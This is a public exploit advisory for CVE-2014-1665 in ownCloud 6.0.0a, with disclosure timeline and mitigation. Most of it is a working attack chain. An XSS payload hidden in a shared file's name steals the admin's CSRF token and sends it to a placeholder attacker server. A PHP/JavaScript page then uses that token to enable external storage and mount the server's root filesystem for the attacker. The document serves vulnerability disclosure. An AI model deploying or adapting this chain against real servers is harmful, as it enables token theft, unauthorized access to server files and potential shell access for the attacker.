ownCloud 6.0.0a File Deletion / XSS / CSRF

Related Vulnerabilities: CVE-2014-1665  
Publish Date: 06 Feb 2014
Author: absane
                							

                # Exploit Title:     ownCloud 6.0.0a File Deletion XSS and CSRF Protection Bypass
# Vendor Homepage:   www.ownCloud.org
# OwnCloud Version:  6.0.0a
# Browsers tested:   Iceweasel 22.0; Internet Explorer 11;
# Server:            Debian. Default LAMP set-up.
# Exploit Author:    James Sibley (absane)
# Blog:              http://blog.noobroot.com
# Discovery date:    December 12th, 2013
# Vendor notified:   December 12th, 2013
# Vendor fixed:      January 22th, 2014
# CVE assignment:    CVE-2014-1665
 
A malicious ownCloud user can upload a file with JavaScript code in the filename, share it, and
cause a XSS attack when the victim tries to either view the contents of the file or delete the
file.
 
If the victim is an ownCloud administrator, an attacker can force the mounting of the webserver's
local file system, leading to unauthorized access to server resources and potentially shell
access.
 
=======================
=Proof of Concept.....=
=======================
1) Create a file named <img src=x onerror=alert(0);>.txt (on a Linux machine)
2) Upload it to OwnCloud by clicking on the Upload button (up arrow next to "new") on the Web UI.
3) Share the file with the victim.
4) When the victim sees the shared file in their "Shared" directory, they can:
    a) View the contents of the file within OwnCloud, or
    b) become suspicious of the file and attempt to delete it.
 
Both a) and b) options will result in Javascript being executed in the victim's web browser.
 
 
=======================
=Exploit..............=
=======================
 
**                                                                      **
** NOTE: Replace [ATTACKER'S WEBSERVER] with the attacker's domain/IP.  **
** NOTE: Replace [ATTACKER] with the attacker's account on ownCloud.    **
**                                                                      **
 
 
** Filename (share a malicious file with this name):
 
<img src=x onerror="var z=document.getElementsByTagName('head')[0].getAttribute('data-requesttoken'); 
document.location='http://[ATTACKER'S WEBSERVER]/ownCloudhack.php?rt='+z";>
 
** Code (ownCloudhack.php):
 
<!DOCTYPE HTML>
<html>
<head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <title>OwnCloud 6.0.0a XSS and CSRF Protection Bypass</title>
        <script type="text/javascript" 
src="http://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
</head>
<body>
    <span id="container"></span>
        <form id="form1">
                <input type="hidden" name="mountPoint" value="LOL">
                <input type="hidden" name="class" value="\OC\Files\Storage\Local">
                <input type="hidden" name="classOptions[datadir]" value="/">
                <input type="hidden" name="mountType" value="user">
                <input type="hidden" name="applicable" value="[ATTACKER]">
                <input type="hidden" name="isPersonal" value="false">
                <?php echo '<input type="hidden" name="requesttoken" value="'.$_GET["rt"].'">' ?>
        </form>
    <script>
        $('#form1').submit(function(event) {
                event.preventDefault();
                $.ajax({
                        type: 'POST',
                        url: 'http://[ATTACKER'S WEBSERVER]/index.php/apps/files_external/ajax/addMountPoint.php',
                        data: $(this).serialize(),
                xhrFields: {
                 withCredentials: true
                },
                        dataType: 'json',
                        }
                });
        });
        </script>
 
        <form id="form2">
                <input type="hidden" name="appid" value="files_external">
                <?php echo '<input type="hidden" name="requesttoken" value="'.$_GET["rt"].'">' ?>
        </form>
    <script>
        $('#form2').submit(function(event) {
                event.preventDefault();
                $.ajax({
                        type: 'POST',
                        url: 'http://[ATTACKER'S WEBSERVER]/index.php/settings/ajax/enableapp.php',
                        data: $(this).serialize(),
                xhrFields: {
                 withCredentials: true
                },
                        dataType: 'json',
                });
        });
 
    function ext() {
        $('#form2').submit();
        $("#container").text("Enabling External Storage...");
    };
    function mount() {
        $('#form1').submit();
        $("#container").text("Mounting the root filesystem...");
    };
    function redirect() {
        window.location.href = 'http://[ATTACKER'S WEBSERVER]/';
        $("#container").text("Redirecting back home ;)");
    };
    setTimeout(function() {ext();}, 0);
    setTimeout(function() {mount();}, 5000);
    setTimeout(function() {redirect();}, 5500);
    </script>
</body>
</html>
 
 
=======================
=Mitigation...........=
=======================
Upgrade to ownCloud 6.0.1 or greater.
 
If upgrading is not an option, then the file can be removed by either
1) manually removing the file from the disk via command line interface, or
2) first renaming the file to something else and then deleting the file.
<p>